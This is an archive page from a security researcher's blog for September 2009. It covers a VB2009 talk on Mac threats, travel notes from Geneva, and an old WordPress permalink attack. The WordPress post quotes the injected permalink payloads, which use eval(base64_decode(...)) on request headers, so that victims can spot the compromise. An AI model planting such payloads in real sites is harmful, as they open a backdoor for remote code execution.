Archive

Archive for September, 2009

VB2009

September 25, 2009 1 comment

I should have posted this content here as well.

So, the presentation has a different twist on what I have wrote in the whitepaper. I started building the understanding about Mac security in my introduction, as I lead the context to analysis at the specific threat families. Then followed by taking the macro analysis by broadening the perspective into attackers’ underlying business models, the competitive advantages it brings while constructing the means, motive and how these aspects build and created opportunity that enables these organize group to perform and deploy threats and attacks to Mac users.

While the momentum of interest and excitement increases, my presentation suddenly froze and crash report pops-up.  Indeed, an ice breaker as I continue to deliver the remaining slides.

At the end, the presentation shared some actual infection report and showed data how successful these threat into penetrating in this platform.

It was a great experience and same time meeting fellow researchers in this conference!

Greetings from Geneva!

Jet d'eau

Jet d’eau (Water Fountain) as taken this morning. It was hot and sunny here in Geneva, so it’s best time to walk around, take some pictures and chill out after taking a good rest and recovering from long trip from Melbourne.

St. Pierre Cathedral

St. Pierre Cathedral is a cathedral in Geneva, Switzerland, belonging to the Swiss Reformed Church.

Wor{d|m}press

It’s really tedious job to update and perhaps, patching from time to time. I should say, security comes with a great responsibility just like parking your car in a right place or locking your valuable computer when leaving.

Last week, users using older version of WordPress noticed unusual strings added to their blogs permalinks which makes a blog post link don’t work.

journeyetc.com responded and describe the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now faces the dilemma of upgrading and cleaning-up. The SQL injection attack leaves a backdoor in which even upgrading, may allow remote attacker to get in.  I recommend further reading to this post, “Old WordPress versions under attack” by Lorelle.

Bandwagon effect

Google.com/trends allows you to check some popular searches or trends that threats might take advantage as well.

However,  you don’t often check it, and for events like “Station Fire” which I just learned from the news this morning (here in Melbourne), it’s good that there are concern Mac users that sends you a heads up!

As a result, I’ve published this post.